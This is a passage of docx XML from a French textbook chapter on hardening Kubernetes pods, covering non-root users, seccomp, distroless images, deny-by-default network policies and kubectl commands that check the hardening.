            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2920"/>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Élévation de privilèges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3555"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>seccompProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2920"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Appels système dangereux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2539"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Appels exotiques bloqués</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UN CONTENEUR ROOT CONTOURNE LA PLUPART DES PROTECTIONS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un processus root dans son conteneur peut, selon les capacités accordées, modifier des fichiers montés et attaquer par des chemins inattendus. L'utilisateur non privilégié est la première mesure, pas la dernière.</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SECCOMP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Filtre d'appels système. Le profil </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RuntimeDefault</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> bloque les appels rarement utilisés, réduisant la surface d'attaque sans configuration spécifique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>91.3 Images et runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le durcissement commence avant le cluster : une image minimale et à jour supprime des outils qui servent aux attaquants après une intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une image sans shell · dockerfile</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Image distroless, sans shell ni gestionnaire de paquets</w:t>
        <w:br/>
        <w:t>FROM node:22-alpine AS build</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY package*.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM gcr.io/distroless/nodejs22-debian12</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY --from=build /app/dist ./dist</w:t>
        <w:br/>
        <w:t>COPY --from=build /app/node_modules ./node_modules</w:t>
        <w:br/>
        <w:t>USER 10001</w:t>
        <w:br/>
        <w:t>EXPOSE 3000</w:t>
        <w:br/>
        <w:t>CMD ["dist/serveur.js"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.361 — Quatre choix</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9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Choix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Gain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image distroless</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Pas de shell pour l'attaquant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débogage plus difficile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Utilisateur non root</w:t>
            </w:r>
          </w:p>
        </w:tc>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Moins de droits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Permissions à ajuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base alpine ou slim</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Surface réduite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bibliothèques C absentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Épinglage par empreinte</w:t>
            </w:r>
          </w:p>
        </w:tc>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Reproductibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Mises à jour manuelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier ce que l'image contient vraiment</w:t>
        <w:br/>
        <w:t>docker run --rm -it --entrypoint /bin/sh registry.exemple.fr/boutique:1.4.2</w:t>
        <w:br/>
        <w:t># si le shell n'existe pas : l'image est bien minimale</w:t>
        <w:br/>
        <w:br/>
        <w:t># Lister les paquets installés</w:t>
        <w:br/>
        <w:t>syft registry.exemple.fr/boutique:1.4.2 -o table | head -20</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NE MONTEZ JAMAIS LE SOCKET DOCKER DANS UN CONTENEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un socket monté donne un contrôle total sur l'hôte : le conteneur peut lancer un conteneur privilégié. Cette pratique, fréquente dans les outils de construction, doit rester confinée à des runners jetables et isolés.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>91.4 Isolation réseau</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Par défaut, tous les pods d'un cluster peuvent se joindre. Une politique réseau qui refuse tout puis autorise le nécessaire transforme un cluster plat en ensemble de zones cloisonnées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux politiques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Refus par défaut dans l'espace de noms</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: refus-par-defaut</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: boutique</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector: {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  policyTypes: [Ingress, Egress]</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t># Autoriser uniquement le trafic depuis l'ingress vers l'API</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api-depuis-ingress</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: boutique</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels: { app: api }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  policyTypes: [Ingress]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - from:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - namespaceSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            matchLabels: { kubernetes.io/metadata.name: ingress-nginx }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - protocol: TCP</w:t>
        <w:br/>
        <w:t xml:space="preserve">          port: 3000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.362 — Quatre règles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0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Règle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Autorise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Vérification</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Refus par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rien</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Test de connexion refusé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Depuis l'ingress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Trafic entrant HTTP</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curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> depuis un pod</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vers la base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortie vers 5432</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Connexion réussie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Vers le DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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UDP 53</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Résolution fonctionnelle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LE DNS EST LA PREMIÈRE CHOSE QU'ON OUBLIE DE RÉAUTORISER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un refus de sortie total casse la résolution de noms et fait échouer toutes les connexions par nom d'hôte. Autorisez explicitement le port 53 vers le service DNS du cluster.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>91.5 Vérifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un durcissement non vérifié est une intention. Quelques commandes montrent l'utilisateur effectif, les capacités et la possibilité d'écrire hors volume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre vérifications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Utilisateur effectif</w:t>
        <w:br/>
        <w:t>kubectl exec -n boutique deploy/api -- id</w:t>
        <w:br/>
        <w:t># uid=10001 gid=10001, pas uid=0</w:t>
        <w:br/>
        <w:br/>
        <w:t># Capacités disponibles</w:t>
        <w:br/>
        <w:t>kubectl exec -n boutique deploy/api -- grep Cap /proc/self/status</w:t>
        <w:br/>
        <w:t># CapEff: 0000000000000000  → aucune capacité</w:t>
        <w:br/>
        <w:br/>
        <w:t># Écriture à la racine du système de fichiers</w:t>
        <w:br/>
        <w:t>kubectl exec -n boutique deploy/api -- touch /essai</w:t>
        <w:br/>
        <w:t># touch: /essai: Read-only file system</w:t>
        <w:br/>
        <w:br/>
        <w:t># Politiques réseau appliquées</w:t>
        <w:br/>
        <w:t>kubectl get networkpolicy -n boutique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.363 — Quatre contrôles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9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Contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>id</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UID non nul</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UID 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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CapEff</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0000000000000000</w:t>
            </w:r>
          </w:p>
        </w:tc>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Capacités résiduelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>touch /</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Lecture seule</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Écriture acceptée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Connexion latérale</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Refusée</w:t>
            </w:r>
          </w:p>
        </w:tc>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Toutes les connexions passent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux tests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Test d'une connexion latérale non autorisée</w:t>
        <w:br/>
        <w:t>kubectl run test --rm -it --image=busybox -n boutique --restart=Never -- \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  wget -qO- --timeout=3 http://api:3000/sante</w:t>
        <w:br/>
        <w:t># attendu : timeout si la politique refuse</w:t>
        <w:br/>
        <w:br/>
        <w:t># Pod Security Standards : restreindre l'admission</w:t>
        <w:br/>
        <w:t>kubectl label namespace boutique \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pod-security.kubernetes.io/enforce=restricted \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pod-security.kubernetes.io/audit=restricted \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pod-security.kubernetes.io/warn=restricted</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DURCIR SANS CASSER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Commencer par l'utilisateur non root.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Activer la lecture seule et monter les volumes nécessaires.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Supprimer toutes les capacités, ajouter seulement le nécessaire.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Refuser le réseau par défaut, autoriser au cas par cas.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Vérifier par des commandes, pas par la lecture du manifeste.</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conteneur partage le noyau : l'isolation est logique.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processus root dans le conteneur élargit fortement l'impact d'une faille.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runAsNonRoot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>readOnlyRootFilesystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>drop: ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> forment le socle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="312" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>seccompProfile: RuntimeDefault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réduit les appels système disponibles.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Une image minimale supprime les outils utiles à l'attaquant.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socket Docker ne se monte jamais dans un conteneur applicatif.</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refus réseau par défaut exige d'autoriser le DNS explicitement.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durcissement se vérifie par des commandes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cluster est durci. Le chapitre suivant conserve les traces nécessaires pour comprendre et prouver.</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91.1 — Durcir un pod</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Un service Node tourne actuellement en root, avec écriture partout.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Passez en utilisateur non root.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Activez la lecture seule.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Supprimez les capacités.</w:t>
      </w:r>
    </w:p>
